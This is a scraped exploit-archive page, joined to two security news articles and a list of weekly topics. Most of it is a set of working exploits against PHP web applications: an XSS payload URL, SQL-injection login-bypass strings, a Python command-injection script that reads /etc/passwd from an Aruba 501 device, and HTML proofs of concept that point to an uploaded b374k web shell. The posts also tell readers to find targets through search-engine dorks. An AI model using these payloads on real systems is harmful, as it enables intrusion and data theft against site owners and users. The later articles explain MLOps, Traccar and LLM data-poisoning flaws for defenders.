Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.

**Human Resource Management System 2024 1.0 Cross Site Scripting**

Posted Aug 26, 2024

Authored by indoushka

Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 25f4d7b7ca25178696d74bb308a9abcdd65caa3fc6c471e46b4b16febaa084ea

Download | Favorite | View

**Human Resource Management System 2024 1.0 Cross Site Scripting**

    =============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 XSS Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload :index.php?msg=Username%2520and%2520Password%2520is%2520Wrong!'"()%26%25<acx><ScRiPt >prompt(926738)</ScRiPt>[+] http://127.0.0.1/hrm/index.php?msg=Username%2520and%2520Password%2520is%2520Wrong!'"()%26%25<acx><ScRiPt >prompt(926738)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,543)
*   Arbitrary (16,904)
*   BBS (2,859)
*   Bypass (1,875)
*   CGI (1,034)
*   Code Execution (7,834)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,116)
*   Encryption (2,389)
*   Exploit (53,289)
*   File Inclusion (4,263)
*   File Upload (1,000)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,239)
*   Local (14,807)
*   Magazine (587)
*   Overflow (13,177)
*   Perl (1,435)
*   PHP (5,226)
*   Proof of Concept (2,394)
*   Protocol (3,731)
*   Python (1,646)
*   Remote (31,695)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,625)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,016)
*   Web (9,973)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,109)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,895)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,615)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,780)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,676)
*   Other

Human Resource Management System 2024 1.0 Cross Site Scripting

Employee Record Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : ERMS Project 1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/                                                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = ' or 0=0 ## & pass = ' or 0=0 ##[+] http://127.0.0.1/erms/admin/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Employee Record Management System 1.0 SQL Injection

DETS Project version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : DETS Project 1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/daily-expense-tracker-using-php-and-mysql/                                                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/dets/add-expense.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

DETS Project 1.0 SQL Injection

Aruba 501 version CN12G5W0XX suffers from a remote command execution vulnerability.

    # Exploit Title: Remote Command Execution | Aurba 501# Date: 17-07-2024# Exploit Author: Hosein Vita# Vendor Homepage: https://www.hpe.com# Version: Aurba 501 CN12G5W0XX# Tested on: Linuximport requestsfrom requests.auth import HTTPBasicAuthdef get_input(prompt, default_value):    user_input = input(prompt)    return user_input if user_input else default_valuebase_url = input("Enter the base URL: ")if not base_url:    print("Base URL is required.")    exit(1)username = get_input("Enter the username (default: admin): ", "admin")password = get_input("Enter the password (default: admin): ", "admin")login_url = f"{base_url}/login.cgi"login_payload = {    "username": username,    "password": password,    "login": "Login"}login_headers = {    "Accept-Encoding": "gzip, deflate, br",    "Content-Type": "application/x-www-form-urlencoded",    "Origin": base_url,    "Connection": "close"}session = requests.Session()requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)# Login to the systemresponse = session.post(login_url, headers=login_headers, data=login_payload, verify=False)# Check if login was successfulif response.status_code == 200 and "login failed" not in response.text.lower():    print("Login successful!")        # The command to be executed on the device    command = "cat /etc/passwd"            ping_ip = f"4.2.2.4||{command}"        # Data to be sent in the POST request    data = {        "ping_ip": ping_ip,        "ping_timeout": "1",        "textareai": "",        "ping_start": "Ping"    }        # Headers to be sent with the request    headers = {        "Accept-Encoding": "gzip, deflate, br",        "Content-Type": "application/x-www-form-urlencoded",        "Origin": base_url,        "Referer": f"{base_url}/admin.cgi?action=ping",        "Connection": "close"    }        # Sending the HTTP POST request to exploit the vulnerability    exploit_url = f"{base_url}/admin.cgi?action=ping"    response = session.post(exploit_url, headers=headers, data=data, verify=False)            if any("root" in value for value in response.headers.values()):        print("Exploit successful! The /etc/passwd file contents are reflected in the headers:")        print(response.headers)    else:        print("Exploit failed. The response headers did not contain the expected output.")else:    print("Login failed. Please check the credentials and try again.")# Print the response headers for further analysisprint(response.headers)

Aruba 501 CN12G5W0XX Remote Command Execution

Bang Resto version 1.0 suffers from an information disclosure vulnerability.

====================================================================================================================================  
| # Title     : Bang Resto 1.0 HTML Form in redirect page Vulnerability                                                            |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   |  
| # Vendor    : https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip                                                |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.  
 Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. 

Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example:   
<?php  
    if (!isset($_SESSION["authenticated"])) {  
        header("Location: auth.php");  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    
This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability.   
The correct code would be 

<?php  
    if (!isset($_SESSION[auth])) {  
        header("Location: auth.php");  
        exit();  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    

[+] infected item : /pass. 

[+] Attack details :

Form action=''

GET /pass/ HTTP/1.1  
Pragma: no-cache  
Cache-Control: no-cache  
Referer: https://127.0.0.1/Bang/admin  
Acunetix-Aspect: enabled  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect-Queries: filelist;aspectalerts  
Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f  
Host: elearning7.smpn49-jkt.sch.id  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

Response  
HTTP/1.1 302 Found  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
x-powered-by: PHP/7.3.33  
location: https://127.0.0.1/Bang/admin  
content-type: text/html; charset=UTF-8  
content-length: 16992  
vary: Accept-Encoding,User-Agent  
date: Fri, 19 Jul 2024 10:09:49 GMT  
server: LiteSpeed  
cache-control: no-cache, no-store, must-revalidate, max-age=0  
platform: hostinger  
strict-transport-security: max-age=31536000; includeSubDomains; preload  
x-xss-protection: 1; mode=block  
x-content-type-options: nosniff  
Original-Content-Encoding: gzip

[+] The impact of this vulnerability : depends on the affected web application.

[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page

Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================

Bang Resto 1.0 Information Disclosure

School Log Management System version 1.0 appears to suffers from a remote SQL injection vulnerability that allows an attacker to achieve code execution.

=============================================================================================================================================| # Title     : School Log Management System 1.0 WYSIWYG Settings Management Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Part 01 : about-us.php[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 .    [+] Line 109 : Send the form data using fetch API (Set your target url)[+] save payload as poc.html[+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Settings Management</title>        <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">        <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">    <style>        /* Custom Styles */        #cimg {            max-width: 100%;            height: auto;        }        #preloader2 {            position: fixed;            top: 0;            left: 0;            width: 100%;            height: 100%;            background: rgba(0, 0, 0, 0.5);            display: flex;            justify-content: center;            align-items: center;            z-index: 9999;        }        .form-group {            margin-bottom: 1rem;        }        .form-group label {            display: block;            margin-bottom: .5rem;        }        .form-group input, .form-group textarea {            width: 100%;            padding: .5rem;            box-sizing: border-box;        }    </style></head><body>    <div class="container">        <form id="manage-settings" method="post" enctype="multipart/form-data">            <div class="form-group">                <label for="name"> Name</label>                <input type="text" id="name" name="name" required>            </div>            <div class="form-group">                <label for="email">Email</label>                <input type="email" id="email" name="email" required>            </div>            <div class="form-group">                <label for="contact">Contact</label>                <input type="tel" id="contact" name="contact" required>            <div class="form-group">                <label for="about">About Content</label>                <textarea class="text-jqte" id="about" name="about"></textarea>            </div>            <div class="form-group">                <label for="img">Cover Image</label>                <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">                <img id="cimg" src="" alt="Selected Image Preview">            </div>            <button type="submit" class="btn btn-primary">Save Settings</button>        </form>    </div>      <div class="modal fade" id="viewer_modal" role='dialog'>        <div class="modal-dialog modal-md" role="document">            <div class="modal-content">                <button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button>                <img src="" alt="">            </div>        </div>    </div>        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>        <script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>    <script>        function displayImg(input, _this) {            if (input.files && input.files[0]) {                var reader = new FileReader();                reader.onload = function (e) {                    $('#cimg').attr('src', e.target.result);                }                reader.readAsDataURL(input.files[0]);            }        }        $(document).ready(function () {            const editorInstance = new FroalaEditor('.text-jqte');        });        $('#manage-settings').submit(function (e) {            e.preventDefault();            start_load();            $.ajax({                url: 'http://127.0.0.1/slms/admin/ajax.php?action=save_settings',                data: new FormData($(this)[0]),                cache: false,                contentType: false,                processData: false,                method: 'POST',                type: 'POST',                error: err => {                    console.log(err);                },                success: function (resp) {                    if (resp == 1) {                        alert_toast('Data successfully saved.', 'success');                        setTimeout(function () {                            location.reload();                        }, 1000);                    }                }            });        });        window.start_load = function () {            $('body').prepend('<div id="preloader2"></div>');        }        window.end_load = function () {            $('#preloader2').fadeOut('fast', function () {                $(this).remove();            });        }        window.viewer_modal = function ($src = '') {            start_load();            var t = $src.split('.');            t = t[1];            if (t == 'mp4') {                var view = $("<video src='" + $src + "' controls autoplay></video>");            } else {                var view = $("<img src='" + $src + "' />");            }            $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();            $('#viewer_modal .modal-content').append(view);            $('#viewer_modal').modal({                show: true,                backdrop: 'static',                keyboard: false,                focus: true            });            end_load();        }        window.uni_modal = function ($title = '', $url = '', $size = "") {            start_load();            $.ajax({                url: $url,                error: err => {                    console.log(err);                    alert("An error occurred");                },                success: function (resp) {                    if (resp) {                        $('#uni_modal .modal-title').html($title);                        $('#uni_modal .modal-body').html(resp);                        if ($size != '') {                            $('#uni_modal .modal-dialog').addClass($size);                        } else {                            $('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md");                        }                        $('#uni_modal').modal({                            show: true,                            backdrop: 'static',                            keyboard: false,                            focus: true                        });                        end_load();                    }                }            });        }        window._conf = function ($msg = '', $func = '', $params = []) {            $('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")");            $('#confirm_modal .modal-body').html($msg);            $('#confirm_modal').modal('show');        }        window.alert_toast = function ($msg = 'TEST', $bg = 'success') {            $('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning');            if ($bg == 'success')                $('#alert_toast').addClass('bg-success');            if ($bg == 'danger')                $('#alert_toast').addClass('bg-danger');            if ($bg == 'info')                $('#alert_toast').addClass('bg-info');            if ($bg == 'warning')                $('#alert_toast').addClass('bg-warning');            $('#alert_toast .toast-body').html($msg);            $('#alert_toast').toast({ delay: 3000 }).toast('show');        }    </script></body></html>[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

School Log Management System 1.0 SQL Injection / Code Execution

Simple College Website version 1.0 appears to suffers from a remote SQL injection vulnerability that allows an attacker to achieve code execution.

=============================================================================================================================================| # Title     : Simple College Website 1.0 WYSIWYG Settings Management Vulnerability                                                        || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html                        |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Part 01 : about-us.php[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 .    [+] Line 109 : Send the form data using fetch API (Set your target url)[+] save payload as poc.html[+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Settings Management</title>        <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">        <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">    <style>        /* Custom Styles */        #cimg {            max-width: 100%;            height: auto;        }        #preloader2 {            position: fixed;            top: 0;            left: 0;            width: 100%;            height: 100%;            background: rgba(0, 0, 0, 0.5);            display: flex;            justify-content: center;            align-items: center;            z-index: 9999;        }        .form-group {            margin-bottom: 1rem;        }        .form-group label {            display: block;            margin-bottom: .5rem;        }        .form-group input, .form-group textarea {            width: 100%;            padding: .5rem;            box-sizing: border-box;        }    </style></head><body>    <div class="container">        <form id="manage-settings" method="post" enctype="multipart/form-data">            <div class="form-group">                <label for="name"> Name</label>                <input type="text" id="name" name="name" required>            </div>            <div class="form-group">                <label for="email">Email</label>                <input type="email" id="email" name="email" required>            </div>            <div class="form-group">                <label for="contact">Contact</label>                <input type="tel" id="contact" name="contact" required>            <div class="form-group">                <label for="about">About Content</label>                <textarea class="text-jqte" id="about" name="about_us"></textarea>            </div>            <div class="form-group">                <label for="img">Cover Image</label>                <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">                <img id="cimg" src="" alt="Selected Image Preview">            </div>            <button type="submit" class="btn btn-primary">Save Settings</button>        </form>    </div>      <div class="modal fade" id="viewer_modal" role='dialog'>        <div class="modal-dialog modal-md" role="document">            <div class="modal-content">                <button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button>                <img src="" alt="">            </div>        </div>    </div>        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>        <script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>    <script>        function displayImg(input, _this) {            if (input.files && input.files[0]) {                var reader = new FileReader();                reader.onload = function (e) {                    $('#cimg').attr('src', e.target.result);                }                reader.readAsDataURL(input.files[0]);            }        }        $(document).ready(function () {            const editorInstance = new FroalaEditor('.text-jqte');        });        $('#manage-settings').submit(function (e) {            e.preventDefault();            start_load();            $.ajax({                url: 'http://127.0.0.1/college_website/admin/ajax.php?action=save_settings',                data: new FormData($(this)[0]),                cache: false,                contentType: false,                processData: false,                method: 'POST',                type: 'POST',                error: err => {                    console.log(err);                },                success: function (resp) {                    if (resp == 1) {                        alert_toast('Data successfully saved.', 'success');                        setTimeout(function () {                            location.reload();                        }, 1000);                    }                }            });        });        window.start_load = function () {            $('body').prepend('<div id="preloader2"></div>');        }        window.end_load = function () {            $('#preloader2').fadeOut('fast', function () {                $(this).remove();            });        }        window.viewer_modal = function ($src = '') {            start_load();            var t = $src.split('.');            t = t[1];            if (t == 'mp4') {                var view = $("<video src='" + $src + "' controls autoplay></video>");            } else {                var view = $("<img src='" + $src + "' />");            }            $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();            $('#viewer_modal .modal-content').append(view);            $('#viewer_modal').modal({                show: true,                backdrop: 'static',                keyboard: false,                focus: true            });            end_load();        }        window.uni_modal = function ($title = '', $url = '', $size = "") {            start_load();            $.ajax({                url: $url,                error: err => {                    console.log(err);                    alert("An error occurred");                },                success: function (resp) {                    if (resp) {                        $('#uni_modal .modal-title').html($title);                        $('#uni_modal .modal-body').html(resp);                        if ($size != '') {                            $('#uni_modal .modal-dialog').addClass($size);                        } else {                            $('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md");                        }                        $('#uni_modal').modal({                            show: true,                            backdrop: 'static',                            keyboard: false,                            focus: true                        });                        end_load();                    }                }            });        }        window._conf = function ($msg = '', $func = '', $params = []) {            $('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")");            $('#confirm_modal .modal-body').html($msg);            $('#confirm_modal').modal('show');        }        window.alert_toast = function ($msg = 'TEST', $bg = 'success') {            $('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning');            if ($bg == 'success')                $('#alert_toast').addClass('bg-success');            if ($bg == 'danger')                $('#alert_toast').addClass('bg-danger');            if ($bg == 'info')                $('#alert_toast').addClass('bg-info');            if ($bg == 'warning')                $('#alert_toast').addClass('bg-warning');            $('#alert_toast .toast-body').html($msg);            $('#alert_toast').toast({ delay: 3000 }).toast('show');        }    </script></body></html>[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Simple College Website 1.0 SQL Injection / Code Execution

Cybersecurity researchers are warning about the security risks in the machine learning (ML) software supply chain following the discovery of more than 20 vulnerabilities that could be exploited to target MLOps platforms.
These vulnerabilities, which are described as inherent- and implementation-based flaws, could have severe consequences, ranging from arbitrary code execution to loading

Cybersecurity researchers are warning about the security risks in the machine learning (ML) software supply chain following the discovery of more than 20 vulnerabilities that could be exploited to target MLOps platforms.

These vulnerabilities, which are described as inherent- and implementation-based flaws, could have severe consequences, ranging from arbitrary code execution to loading malicious datasets.

MLOps platforms offer the ability to design and execute an ML model pipeline, with a model registry acting as a repository used to store and version-trained ML models. These models can then be embedded within an application or allow other clients to query them using an API (aka model-as-a-service).

"Inherent vulnerabilities are vulnerabilities that are caused by the underlying formats and processes used in the target technology," JFrog researchers said in a detailed report.

Some examples of inherent vulnerabilities include abusing ML models to run code of the attacker's choice by taking advantage of the fact that models support automatic code execution upon loading (e.g., Pickle model files).

This behavior also extends to certain dataset formats and libraries, which allow for automatic code execution, thereby potentially opening the door to malware attacks when simply loading a publicly-available dataset.

Another instance of inherent vulnerability concerns JupyterLab (formerly Jupyter Notebook), a web-based interactive computational environment that enables users to execute blocks (or cells) of code and view the corresponding results.

"An inherent issue that many do not know about, is the handling of HTML output when running code blocks in Jupyter," the researchers pointed out. "The output of your Python code may emit HTML and \[JavaScript\] which will be happily rendered by your browser."

The problem here is that the JavaScript result, when run, is not sandboxed from the parent web application and that the parent web application can automatically run arbitrary Python code.

In other words, an attacker could output a malicious JavaScript code such that it adds a new cell in the current JupyterLab notebook, injects Python code into it, and then executes it. This is particularly true in cases when exploiting a cross-site scripting (XSS) vulnerability.

To that end, JFrog said it identified an XSS flaw in MLFlow (CVE-2024-27132, CVSS score: 7.5) that stems from a lack of sufficient sanitization when running an untrusted recipe, resulting in client-side code execution in JupyterLab.

"One of our main takeaways from this research is that we need to treat all XSS vulnerabilities in ML libraries as potential arbitrary code execution, since data scientists may use these ML libraries with Jupyter Notebook," the researchers said.

The second set of flaws relate to implementation weaknesses, such as lack of authentication in MLOps platforms, potentially permitting a threat actor with network access to obtain code execution capabilities by abusing the ML Pipeline feature.

These threats aren't theoretical, with financially motivated adversaries abusing such loopholes, as observed in the case of unpatched Anyscale Ray (CVE-2023-48022, CVSS score: 9.8), to deploy cryptocurrency miners.

A second type of implementation vulnerability is a container escape targeting Seldon Core that enables attackers to go beyond code execution to move laterally across the cloud environment and access other users' models and datasets by uploading a malicious model to the inference server.

The net outcome of chaining these vulnerabilities is that they could not only be weaponized to infiltrate and spread inside an organization, but also compromise servers.

"If you're deploying a platform that allows for model serving, you should now know that anybody that can serve a new model can also actually run arbitrary code on that server," the researchers said. "Make sure that the environment that runs the model is completely isolated and hardened against a container escape."

The disclosure comes as Palo Alto Networks Unit 42 detailed two now-patched vulnerabilities in the open-source LangChain generative AI framework (CVE-2023-46229 and CVE-2023-44467) that could have allowed attackers to execute arbitrary code and access sensitive data, respectively.

Last month, Trail of Bits also revealed four issues in Ask Astro, a retrieval augmented generation (RAG) open-source chatbot application, that could lead to chatbot output poisoning, inaccurate document ingestion, and potential denial-of-service (DoS).

Just as security issues are being exposed in artificial intelligence-powered applications, techniques are also being devised to poison training datasets with the ultimate goal of tricking large language models (LLMs) into producing vulnerable code.

"Unlike recent attacks that embed malicious payloads in detectable or irrelevant sections of the code (e.g., comments), CodeBreaker leverages LLMs (e.g., GPT-4) for sophisticated payload transformation (without affecting functionalities), ensuring that both the poisoned data for fine-tuning and generated code can evade strong vulnerability detection," a group of academics from the University of Connecticut said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Identify Over 20 Supply Chain Vulnerabilities in MLOps Platforms

Two security vulnerabilities have been disclosed in the open-source Traccar GPS tracking system that could be potentially exploited by unauthenticated attackers to achieve remote code execution under certain circumstances.
Both the vulnerabilities are path traversal flaws and could be weaponized if guest registration is enabled, which is the default configuration for Traccar 5, Horizon3.ai

Software Security / Vulnerability

Two security vulnerabilities have been disclosed in the open-source Traccar GPS tracking system that could be potentially exploited by unauthenticated attackers to achieve remote code execution under certain circumstances.

Both the vulnerabilities are path traversal flaws and could be weaponized if guest registration is enabled, which is the default configuration for Traccar 5, Horizon3.ai researcher Naveen Sunkavally said.

A brief description of the shortcomings is as follows -

*   **CVE-2024-24809** (CVSS score: 8.5) - Path Traversal: 'dir/../../filename' and unrestricted upload of file with dangerous type
*   **CVE-2024-31214** (CVSS score: 9.7) - Unrestricted file upload vulnerability in device image upload could lead to remote code execution

"The net result of CVE-2024-31214 and CVE-2024-24809 is that an attacker can place files with arbitrary content anywhere on the file system," Sunkavally said. "However an attacker only has partial control over the filename."

The issues have to do with how the program handles device image file uploads, effectively allowing an attacker to overwrite certain files on the file system and trigger code execution. This includes files matching the below naming format -

*   device.ext, where the attacker can control ext, but there MUST be an extension
*   blah", where the attacker can control blah but the filename must end with a double quote
*   blah1";blah2=blah3, where the attacker can control blah1, blah2, and blah3, but the double quote semicolon sequence and equals symbol MUST be present

In a hypothetical proof-of-concept (PoC) devised by Horizon3.ai, an adversary can exploit the path traversal in the Content-Type header to upload a crontab file and obtain a reverse shell on the attacker host.

This attack method, however, does not work on Debian/Ubuntu-based Linux systems due to file naming restrictions that bar crontab files from having periods or double quotes.

An alternative mechanism entails taking advantage of Traccar being installed as a root-level user to drop a kernel module or configuring an udev rule to run an arbitrary command every time a hardware event is raised.

On susceptible Windows instances, remote code execution could also be achieved by placing a shortcut (LNK) file named "device.lnk" in the C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp folder, which gets subsequently executed when any victim user logs into the Traccar host.

Traccar versions 5.1 to 5.12 are vulnerable to CVE-2024-31214 and CVE-2024-2809. The issues have been addressed with the release of Traccar 6 in April 2024 which turns off self-registration by default, thereby reducing the attack surface.

"If the registration setting is true, readOnly is false, and deviceReadonly is false, then an unauthenticated attacker can exploit these vulnerabilities," Sunkavally said. "These are the default settings for Traccar 5."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Flaws in Traccar GPS System Expose Users to Remote Attacks

A list of topics we covered in the week of August 19 to August 25 of 2024

August 26, 2024 - This week on the Lock and Code podcast, we speak with Nitya Sharma about why AI is a far bigger concern than malware in staying safe.

August 23, 2024 - Facebook scammers are posting links to fake funeral live streams to get victims to sign up for paid services or steal credit card details

August 22, 2024 - Google has released an update to Chrome that fixes one zero-day vulnerability and introduces Google Lens for desktop.

August 21, 2024 - Once again, threat actors seek out Google search ads for top software downloads, but this time they show a lot of patience and bring on evasion tricks.

August 21, 2024 - Getting a notification that your child's data has been stolen is sadly becoming more commonplace. Here are some things you can do to avoid identity theft.

Tag

#vulnerability